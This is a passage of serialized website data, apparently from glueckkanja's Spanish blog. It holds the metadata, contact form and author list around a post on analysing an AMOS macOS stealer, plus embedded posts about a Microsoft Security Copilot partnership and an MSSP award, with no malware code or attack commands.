Sin hashes conocidos, sin datos de C2 en ninguna base de datos pública. Nuestro SOC desmanteló seis capas de ofuscación, extrajo todos los indicadores y distribuyó la protección a todos los clientes SOC en cuestión de horas, antes de que el sector hubiera visto siquiera la muestra.","AMOS stealer, malware macOS, ingeniería inversa, análisis de malware, Ghidra, ARM64, respuesta a incidentes, threat intelligence, CSOC, seguridad macOS, stealer malware, shared threat intelligence, atomic macOS stealer",true,{"menuItems":2182},[2183,2186,2189,2192,2194],{"href":2184,"text":2185},"#el-incidente-un-escenario-con-ioc-desconocido","El incidente",{"href":2187,"text":2188},"#stage-1-comprobaciones-de-sandbox","Stage 1: Sandbox",{"href":2190,"text":2191},"#stage-2-ingenieria-inversa-del-binario-helper","Stage 2: Análisis binario",{"href":2193,"text":2046},"#la-puerta-trasera",{"href":2195,"text":2196},"#el-poder-del-escudo-colectivo-nuestra-plataforma-de-shared-threat-intelligence","Shared Threat Intelligence",{"noMargin":2180},{"quote":2180,"infos":2199},{"bgColor":2200,"headline":2201,"subline":2202,"level":41,"textStyling":2203,"flush":2204,"person":2205,"form":2211},"var(--color-blue-dark)","Contactadnos","¿Queréis saber cómo nuestra plataforma de Shared Threat Intelligence os protege frente a variantes de malware desconocidas antes de que el sector las detecte? Hablemos.","text-light","justify-content-end",{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":2210},"/people/people-jan-geisbauer-csoc.jpg","Retrato de Jan Geisbauer, Head of Security en glueckkanja","Jan Geisbauer","Head of Security","Lo peligroso de esta variante no era la complejidad técnica, por impresionante que sea. Lo peligroso era la ventana de tiempo. 
Sin Shared Threat Intelligence, nuestros otros clientes habrían estado expuestos durante horas mientras todavía analizábamos.",{"ctaText":2212,"cta":2213,"method":2168,"action":2215,"fields":2216},"Enviar",{"skin":2214},"primary is-light","/es/successful",[2217,2221,2225,2229,2234,2239,2242,2245,2248,2251,2253],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2220},"Nombre*","name","Por favor, introducid vuestro nombre.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":2224},"Empresa*","company","Por favor, introducid vuestra empresa.",{"label":2226,"type":2227,"id":2227,"required":2180,"requiredMsg":2228},"Dirección de correo electrónico*","email","Por favor, introducid vuestra dirección de correo.",{"label":2230,"type":2231,"id":2232,"required":2167,"requiredMsg":2233},"Vuestro mensaje","textarea","message","Por favor, introducid un mensaje.",{"label":2235,"type":2236,"id":2237,"required":2180,"requiredMsg":2238},"Vuestros datos se almacenarán con nosotros con el fin de procesar y responder a vuestra consulta. 
Para más información sobre protección de datos, consultad nuestra \u003Ca href=\"/es/privacy\">Política de privacidad\u003C/a>.","checkbox","dataprotection","Por favor, confirmad",{"type":2240,"id":2241,"value":2175},"hidden","_topic",{"type":2240,"id":2243,"value":2244},"_location","World",{"type":2240,"id":2246,"value":2247},"_subject","Form: Blog AMOS Stealer CSOC | ES",{"type":2240,"id":2249,"value":2250},"inbox_key","gkgab-contact-form",{"type":2240,"id":2252},"_gotcha",{"type":2240,"id":2254},"jsonData",[2256,2259,2262],{"lang":2257,"href":2258},"en","/en/posts/2026-04-10-incident-to-intelligence",{"lang":2260,"href":2261},"de","/de/posts/2026-04-10-incident-to-intelligence",{"lang":2170,"href":2263},"/es/posts/2026-04-10-incident-to-intelligence","/posts/2026-04-10-incident-to-intelligence",{"title":5,"description":14},"posts/2026-04-10-incident-to-intelligence",[2268,2269,2270,2271,2272],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations Center","ah97iBmtBAajZp8HBFLvd3hjAnO1zFgUdiCt4e6JYew",{"id":2275,"extension":2276,"meta":2277,"stem":2611,"__hash__":2612},"authors_data/authors.json","json",{"path":2278,"Alexander Schlindwein":2279,"Sophie Luna":2285,"Nadine Kern":2293,"Karsten Kleinschmidt":2300,"Julian Wendt":2306,"Holger Bunkradt":2311,"Ralf Mania":2317,"Oliver Kieselbach":2323,"Steffen Schwerdtfeger":2329,"Gunnar Winter":2337,"Jan Petersen":2342,"Thorsten Kunzi":2347,"Moritz Pohl":2351,"Thorben Pöschus":2356,"Christoph Hannebauer":2362,"Marco Scheel":2366,"Christopher Brumm":2371,"Florian Klante":2378,"Niklas Bachmann":2383,"Nils Krautkrämer":2388,"Patrick Treptau":2394,"Peter Beckendorf":2399,"Patrick Sobau":2404,"Jörg Wunderlich":2409,"Michael Breither":2413,"Christian Kanja":2418,"Zeba Hoffmann":2424,"Jochen Fröhlich":2429,"Jan Geisbauer":2433,"Gerrit Reinke":2444,"Christian Kordel":2450,"Stephan Wälde":2454,"Carolin Kanja":2459,"Adrian Ritter":2465,"Marvin Bangert":2470,"Thorsten 
Pickhan":2476,"Christian Lorenz":2482,"Denis Böhm":2487,"Fabian Bader":2492,"Juan Jose Fernandez Perez":2498,"Mahschid Sayyar":2503,"Benjamin Dassow":2508,"Markus Walschburger":2513,"Jonathan Haist":2518,"Daniel Rohregger":2523,"Thomas Naunheim":2528,"Florian Stöckl":2533,"Pascal Asch":2538,"Markus Kättner":2542,"Anna Ulbricht":2549,"body":2556,"title":2610,"Thorben Poeschus":2356,"Nils Krautkraemer":2388,"Joerg Wunderlich":2409,"Jochen Froehlich":2429,"Stephan Waelde":2454,"Denis Boehm":2487,"Florian Stoeckl":2533,"Markus Kaettner":2542},"/authors",{"display_name":2280,"avatar":2281,"permalink":2282,"twitter":2283,"linkedin":2284},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":2286,"avatar":2287,"permalink":2288,"twitter":2289,"linkedin":2290,"imageOffsetLeft":2291,"imageOffsetTop":2292},"Sophie Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":2294,"avatar":2295,"permalink":2296,"twitter":2297,"linkedin":2298,"imageOffsetTop":2299},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":2301,"avatar":2302,"permalink":2303,"twitter":2304,"linkedin":2305},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":2307,"avatar":2308,"permalink":2309,"linkedin":2310},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":2312,"avatar":2313,"permalink":2314,"linkedin":2315,"twitter":2316},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":2318,"avatar":2319,"permalink":2320,"linkedin":2321,"twitter":2322},"Ralf 
Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":2324,"avatar":2325,"permalink":2326,"linkedin":2327,"twitter":2328},"Oliver Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":2330,"avatar":2331,"permalink":2332,"linkedin":2333,"twitter":2334,"imageOffsetTop":2335,"imageOffsetLeft":2336},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":2338,"avatar":2339,"permalink":2340,"twitter":2289,"linkedin":2341},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":2343,"avatar":2344,"permalink":2345,"twitter":2289,"linkedin":2346},"Jan Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":2348,"avatar":2349,"permalink":2350,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":2352,"avatar":2353,"permalink":2354,"twitter":2289,"linkedin":2355},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":2357,"avatar":2358,"permalink":2359,"twitter":2360,"linkedin":2361},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":2363,"avatar":2364,"permalink":2365,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},"Dr. 
Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":2367,"avatar":2368,"permalink":2369,"twitter":2370,"linkedin":2370},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":2372,"avatar":2373,"permalink":2374,"twitter":2375,"linkedin":2376,"imageOffsetTop":2377},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":2379,"avatar":2380,"permalink":2381,"linkedin":2382,"twitter":2289},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":2384,"avatar":2385,"permalink":2386,"linkedin":2387,"twitter":2289},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":2389,"avatar":2390,"permalink":2391,"twitter":2392,"linkedin":2393},"Nils Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":2395,"avatar":2396,"permalink":2397,"linkedin":2398,"twitter":2289},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":2400,"avatar":2401,"permalink":2402,"linkedin":2403,"twitter":2289,"imageOffsetTop":2299},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":2405,"avatar":2406,"permalink":2407,"linkedin":2408,"twitter":2289},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":2410,"avatar":2411,"permalink":2412,"twitter":2289},"Jörg 
Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":2414,"avatar":2415,"permalink":2416,"twitter":2289,"linkedin":2417},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":2419,"avatar":2420,"permalink":2421,"twitter":2422,"linkedin":2423},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":2425,"avatar":2426,"permalink":2427,"linkedin":2428,"twitter":2289},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":2430,"avatar":2431,"permalink":2432,"twitter":2289,"linkedin":2341},"Jochen Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":2208,"avatar":2434,"permalink":2435,"twitter":2436,"linkedin":2436,"imageOffsetTop":2299,"socials":2437},"c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[2438,2441],{"text":2439,"href":2440},"Blog","https://emptydc.com",{"text":2442,"href":2443},"Podcast","https://hairlessinthecloud.com",{"display_name":2445,"avatar":2446,"permalink":2447,"twitter":2448,"linkedin":2449},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":2451,"avatar":2452,"permalink":2453,"twitter":2289,"linkedin":2341},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":2455,"avatar":2456,"permalink":2457,"twitter":2458,"linkedin":2341},"Stephan Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":2460,"avatar":2461,"permalink":2462,"twitter":2463,"linkedin":2464},"Carolin 
Kanja","c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":2466,"avatar":2467,"permalink":2468,"twitter":2469,"linkedin":2469},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":2471,"avatar":2472,"permalink":2473,"twitter":2474,"linkedin":2475},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":2477,"avatar":2478,"permalink":2479,"twitter":2480,"linkedin":2481},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":2483,"avatar":2484,"permalink":2485,"linkedin":2486,"twitter":2289},"Christian Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":2488,"avatar":2489,"permalink":2490,"linkedin":2491,"twitter":2289},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":2493,"avatar":2494,"permalink":2495,"linkedin":2496,"twitter":2497},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":2499,"avatar":2500,"permalink":2501,"linkedin":2502},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":2504,"avatar":2505,"permalink":2506,"linkedin":2507},"Mahschid Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":2509,"avatar":2510,"permalink":2511,"linkedin":2512},"Benjamin 
Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":2514,"avatar":2515,"permalink":2516,"linkedin":2517},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":2519,"avatar":2520,"permalink":2521,"linkedin":2522,"imageOffsetTop":2299},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":2524,"avatar":2525,"permalink":2526,"linkedin":2527,"imageOffsetTop":2299},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":2529,"avatar":2530,"permalink":2531,"linkedin":2532,"imageOffsetTop":2377},"Thomas Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":2534,"avatar":2535,"permalink":2536,"linkedin":2537,"imageOffsetTop":2377},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":7,"avatar":2539,"permalink":2540,"linkedin":2541,"imageOffsetTop":2377},"c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":2543,"avatar":2544,"permalink":2545,"linkedin":2546,"imageOffsetTop":2547,"imageOffsetLeft":2548},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":2550,"avatar":2551,"permalink":2552,"linkedin":2553,"imageOffsetTop":2554,"imageOffsetLeft":2555},"Anna Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"Alexander Schlindwein":2557,"Sophie Luna":2558,"Nadine Kern":2559,"Karsten Kleinschmidt":2560,"Julian Wendt":2561,"Holger Bunkradt":2562,"Ralf Mania":2563,"Oliver 
Kieselbach":2564,"Steffen Schwerdtfeger":2565,"Gunnar Winter":2566,"Jan Petersen":2567,"Thorsten Kunzi":2568,"Moritz Pohl":2569,"Thorben Pöschus":2570,"Christoph Hannebauer":2571,"Marco Scheel":2572,"Christopher Brumm":2573,"Florian Klante":2574,"Niklas Bachmann":2575,"Nils Krautkrämer":2576,"Patrick Treptau":2577,"Peter Beckendorf":2578,"Patrick Sobau":2579,"Jörg Wunderlich":2580,"Michael Breither":2581,"Christian Kanja":2582,"Zeba Hoffmann":2583,"Jochen Fröhlich":2584,"Jan Geisbauer":2585,"Gerrit Reinke":2589,"Christian Kordel":2590,"Stephan Wälde":2591,"Carolin Kanja":2592,"Adrian Ritter":2593,"Marvin Bangert":2594,"Thorsten Pickhan":2595,"Christian Lorenz":2596,"Denis Böhm":2597,"Fabian Bader":2598,"Juan Jose Fernandez Perez":2599,"Mahschid Sayyar":2600,"Benjamin Dassow":2601,"Markus Walschburger":2602,"Jonathan Haist":2603,"Daniel Rohregger":2604,"Thomas Naunheim":2605,"Florian Stöckl":2606,"Pascal Asch":2607,"Markus Kättner":2608,"Anna Ulbricht":2609},{"display_name":2280,"avatar":2281,"permalink":2282,"twitter":2283,"linkedin":2284},{"display_name":2286,"avatar":2287,"permalink":2288,"twitter":2289,"linkedin":2290,"imageOffsetLeft":2291,"imageOffsetTop":2292},{"display_name":2294,"avatar":2295,"permalink":2296,"twitter":2297,"linkedin":2298,"imageOffsetTop":2299},{"display_name":2301,"avatar":2302,"permalink":2303,"twitter":2304,"linkedin":2305},{"display_name":2307,"avatar":2308,"permalink":2309,"linkedin":2310},{"display_name":2312,"avatar":2313,"permalink":2314,"linkedin":2315,"twitter":2316},{"display_name":2318,"avatar":2319,"permalink":2320,"linkedin":2321,"twitter":2322},{"display_name":2324,"avatar":2325,"permalink":2326,"linkedin":2327,"twitter":2328},{"display_name":2330,"avatar":2331,"permalink":2332,"linkedin":2333,"twitter":2334,"imageOffsetTop":2335,"imageOffsetLeft":2336},{"display_name":2338,"avatar":2339,"permalink":2340,"twitter":2289,"linkedin":2341},{"display_name":2343,"avatar":2344,"permalink":2345,"twitter":2289,"linkedin":2346},{"displ
ay_name":2348,"avatar":2349,"permalink":2350,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},{"display_name":2352,"avatar":2353,"permalink":2354,"twitter":2289,"linkedin":2355},{"display_name":2357,"avatar":2358,"permalink":2359,"twitter":2360,"linkedin":2361},{"display_name":2363,"avatar":2364,"permalink":2365,"twitter":2289,"linkedin":2341,"imageOffsetTop":2299},{"display_name":2367,"avatar":2368,"permalink":2369,"twitter":2370,"linkedin":2370},{"display_name":2372,"avatar":2373,"permalink":2374,"twitter":2375,"linkedin":2376,"imageOffsetTop":2377},{"display_name":2379,"avatar":2380,"permalink":2381,"linkedin":2382,"twitter":2289},{"display_name":2384,"avatar":2385,"permalink":2386,"linkedin":2387,"twitter":2289},{"display_name":2389,"avatar":2390,"permalink":2391,"twitter":2392,"linkedin":2393},{"display_name":2395,"avatar":2396,"permalink":2397,"linkedin":2398,"twitter":2289},{"display_name":2400,"avatar":2401,"permalink":2402,"linkedin":2403,"twitter":2289,"imageOffsetTop":2299},{"display_name":2405,"avatar":2406,"permalink":2407,"linkedin":2408,"twitter":2289},{"display_name":2410,"avatar":2411,"permalink":2412,"twitter":2289},{"display_name":2414,"avatar":2415,"permalink":2416,"twitter":2289,"linkedin":2417},{"display_name":2419,"avatar":2420,"permalink":2421,"twitter":2422,"linkedin":2423},{"display_name":2425,"avatar":2426,"permalink":2427,"linkedin":2428,"twitter":2289},{"display_name":2430,"avatar":2431,"permalink":2432,"twitter":2289,"linkedin":2341},{"display_name":2208,"avatar":2434,"permalink":2435,"twitter":2436,"linkedin":2436,"imageOffsetTop":2299,"socials":2586},[2587,2588],{"text":2439,"href":2440},{"text":2442,"href":2443},{"display_name":2445,"avatar":2446,"permalink":2447,"twitter":2448,"linkedin":2449},{"display_name":2451,"avatar":2452,"permalink":2453,"twitter":2289,"linkedin":2341},{"display_name":2455,"avatar":2456,"permalink":2457,"twitter":2458,"linkedin":2341},{"display_name":2460,"avatar":2461,"permalink":2462,"twitter":2463,"li
nkedin":2464},{"display_name":2466,"avatar":2467,"permalink":2468,"twitter":2469,"linkedin":2469},{"display_name":2471,"avatar":2472,"permalink":2473,"twitter":2474,"linkedin":2475},{"display_name":2477,"avatar":2478,"permalink":2479,"twitter":2480,"linkedin":2481},{"display_name":2483,"avatar":2484,"permalink":2485,"linkedin":2486,"twitter":2289},{"display_name":2488,"avatar":2489,"permalink":2490,"linkedin":2491,"twitter":2289},{"display_name":2493,"avatar":2494,"permalink":2495,"linkedin":2496,"twitter":2497},{"display_name":2499,"avatar":2500,"permalink":2501,"linkedin":2502},{"display_name":2504,"avatar":2505,"permalink":2506,"linkedin":2507},{"display_name":2509,"avatar":2510,"permalink":2511,"linkedin":2512},{"display_name":2514,"avatar":2515,"permalink":2516,"linkedin":2517},{"display_name":2519,"avatar":2520,"permalink":2521,"linkedin":2522,"imageOffsetTop":2299},{"display_name":2524,"avatar":2525,"permalink":2526,"linkedin":2527,"imageOffsetTop":2299},{"display_name":2529,"avatar":2530,"permalink":2531,"linkedin":2532,"imageOffsetTop":2377},{"display_name":2534,"avatar":2535,"permalink":2536,"linkedin":2537,"imageOffsetTop":2377},{"display_name":7,"avatar":2539,"permalink":2540,"linkedin":2541,"imageOffsetTop":2377},{"display_name":2543,"avatar":2544,"permalink":2545,"linkedin":2546,"imageOffsetTop":2547,"imageOffsetLeft":2548},{"display_name":2550,"avatar":2551,"permalink":2552,"linkedin":2553,"imageOffsetTop":2554,"imageOffsetLeft":2555},"Authors","authors","Qkbr0Ywae26Kxloa5JhqFSd0eMg8Ccs9DhjH7FyMzvY",[2614,2678,2723,2851,2958,3027,3100,3284,3442,3774,4078,4214,4292,4456,4566,17022,17231,17372,18155,18319,18491,18627,18750,19571,20139,20750,20813,21128,21353],{"id":2615,"title":2616,"author":2617,"body":2618,"cta":2165,"description":2622,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2660,"moment":2661,"navigation":2180,"path":2672,"seo":2673,"stem":2674,"tags":2675,"webcast":2167,"__hash__":2677},"content_es/posts/2023-11-15-m
icrosoft-security-copilot-partner.md","glueckkanja es uno de los primeros socios de Microsoft Security Copilot",[2460],{"type":9,"value":2619,"toc":2657},[2620,2623,2626,2635,2638,2641,2645,2648,2651,2654],[12,2621,2622],{},"glueckkanja anuncia su participación exclusiva en la Microsoft Security Copilot Partner Private Preview, un reconocimiento pionero a su experiencia de primera clase en tecnologías de seguridad de Microsoft. Seleccionada por su amplia experiencia, mentalidad innovadora y su estrecha y confiable asociación con Microsoft, glueckkanja está al frente de la exploración de funciones de seguridad revolucionarias y en proporcionar retroalimentación significativa sobre tecnologías futuristas.",[12,2624,2625],{},"\"La inteligencia artificial es una de las tecnologías más influyentes de nuestro tiempo y tiene el potencial de lograr avances significativos y fundamentales en la ciberseguridad\", dijo Ann Johnson, Vicepresidenta Corporativa de Desarrollo de Negocios de Seguridad de Microsoft. \"La seguridad es un deporte de equipo, y nos complace trabajar junto con nuestro ecosistema de socios de Security Copilot para entregar soluciones que fortalezcan la ciberdefensa y hagan realidad la promesa de la IA\".",[12,2627,2628,2629],{},"glueckkanja está colaborando con los equipos de productos de Microsoft para ayudar a dar forma al desarrollo del producto Security Copilot en varios aspectos, incluyendo la validación y refinamiento de nuevos escenarios futuros, proporcionando retroalimentación sobre el desarrollo del producto y operaciones para incorporar en futuros lanzamientos del producto, y la validación y retroalimentación de APIs para ayudar en la extensibilidad de Security Copilot. Para saber más, ",[2630,2631,2634],"a",{"href":2632,"target":2633},"https://aka.ms/IgniteFY24SecurityBlogPost","_blank","lea el anuncio.",[12,2636,2637],{},"\"Para un analista, trabajar con Security Copilot es como llevar un exoesqueleto. 
Todas sus habilidades y conocimientos se ven de repente y enormemente amplificados. Trabajar con contextos complejos se vuelve fácil y se puede hacer en un tiempo sin precedentes. En glueckkanja, nos encanta Security Copilot\", dijo Jan Geisbauer, líder de seguridad en glueckkanja AG.",[12,2639,2640],{},"Security Copilot es el primer producto de seguridad impulsado por IA que permite a los profesionales de seguridad responder rápidamente a amenazas, procesar señales a la velocidad de la máquina y evaluar la exposición al riesgo en minutos. Combina un modelo avanzado de lenguaje extenso (LLM) con un modelo específico de seguridad enriquecido por la única inteligencia global de ciberamenazas de Microsoft y más de 65 billones de señales diarias.",[186,2642,2644],{"id":2643},"acerca-de-glueckkanja","Acerca de glueckkanja",[12,2646,2647],{},"glueckkanja, un destacado proveedor de servicios gestionados en la nube, es un socio principal de Microsoft que ofrece soluciones integrales en la nube. Con un enfoque unificado de planificación, glueckkanja utiliza la infraestructura como código para trasladar y apoyar las infraestructuras de los clientes en la nube.",[12,2649,2650],{},"Con un enfoque en la operación segura y fiable de soluciones de Workplace, servicios de Azure e infraestructuras de seguridad, glueckkanja atiende tanto a empresas medianas como grandes. El Centro de Operaciones de Seguridad en la Nube de glueckkanja protege continuamente las infraestructuras de los clientes y puede combatir incidentes y aplicar estrategias de protección. Con un equipo de respuesta a incidentes y APT disponible 24/7, glueckkanja garantiza que los clientes reciban asistencia inmediata en caso de emergencia y defensa contra ciberamenazas, asegurando que su infraestructura esté siempre actualizada con los últimos estándares de seguridad.",[12,2652,2653],{},"Para garantizar una experiencia nativa de Microsoft en la nube, glueckkanja ha desarrollado productos propios. 
Estas herramientas permiten una infraestructura completamente protegida y centrada en la nube. Su gama de productos incluye KONNEKT para trabajar con datos de Office 365 locales, RADIUSaaS y SCEPman para autenticación de red segura sin servidor, RealmJoin para distribución de software en la nube y Unified Contacts para búsqueda simplificada de contactos en Microsoft Teams.",[12,2655,2656],{},"glueckkanja se encuentra entre los primeros socios a nivel mundial que recibieron la distinción Microsoft Verified Managed Extended Detection and Response (MXDR). Con un equipo de casi 200 expertos, glueckkanja fue nombrado Microsoft Worldwide Partner of the Year en 2017, 2019, 2020, 2022 y 2023. Desde 2019, glueckkanja se ha mantenido regularmente a la vanguardia en el cuadrante ISG Microsoft 365 Alemania. Además, con sus innovaciones, glueckkanja está entre las TOP 100 empresas en Alemania, y una notable calificación de 4,8/5 en kununu consolida su reputación como un empleador líder para las empresas medianas.",{"title":65,"searchDepth":111,"depth":111,"links":2658},[2659],{"id":2643,"depth":329,"text":2644},{"lang":2170,"titleClass":2172,"date":2661,"categories":2662,"blogtitlepic":2664,"socialimg":2665,"customExcerpt":2666,"keywords":2667,"hreflang":2668},"2023-11-15",[2663],"Corporate","head-security-copilot","/blog/heads/head-security-copilot.jpg","glueckkanja anunció hoy que Microsoft ha seleccionado a la empresa para el Microsoft Security Copilot Partner Private Preview. Con su experiencia en tecnologías de seguridad de Microsoft, glueckkanja contribuirá a dar forma a esta iniciativa de seguridad impulsada por IA. La compañía trabajará estrechamente con los equipos de productos de Microsoft para apoyar el desarrollo del producto Security Copilot de diversas maneras. 
Esta colaboración es un hito importante en los esfuerzos de glueckkanja por ofrecer soluciones innovadoras y seguras a sus clientes.","Microsoft Security Copilot, AI in Cybersecurity, Cybersecurity Solutions, Microsoft Security Technologies, Security Copilot Development, AI-Powered Security Product, Cyber Threat Response, Global Threat Intelligence, Tech Innovation in Security, Advanced Large Language Model, Microsoft Ignite, Microsoft Copilot Flight Engineers",[2669,2671],{"lang":2260,"href":2670},"/blog/corporate/2023/11/microsoft-security-copilot-partner",{"lang":2257,"href":2670},"/posts/2023-11-15-microsoft-security-copilot-partner",{"title":2616,"description":2622},"posts/2023-11-15-microsoft-security-copilot-partner",[2663,2175,2676],"Copilot","eDLNv_Tu_3vHPC9XYkQxP-MCYxS_3-nBxdLQhpwAXus",{"id":2679,"title":2680,"author":2681,"body":2682,"cta":2165,"description":2686,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":2698,"moment":2699,"navigation":2180,"path":2715,"seo":2716,"stem":2717,"tags":2718,"webcast":2167,"__hash__":2722},"content_es/posts/2024-03-13-mssp-2024.md","Después de los Oscar, ¡viene el MSSP!",[2460],{"type":9,"value":2683,"toc":2696},[2684,2687,2690,2693],[12,2685,2686],{},"El MSSP es uno de los premios más relevantes en el crucial campo de la seguridad. Este año, por quinta vez, se reconocerá a los socios de Microsoft por su trabajo excepcional y sus contribuciones a la ciberseguridad. Lo que hace tan único al premio MSSP para nosotros es que todos los finalistas son miembros de la MISA y proveedores de servicios gestionados de seguridad, que han integrado sus soluciones de seguridad en la tecnología de seguridad de Microsoft. 
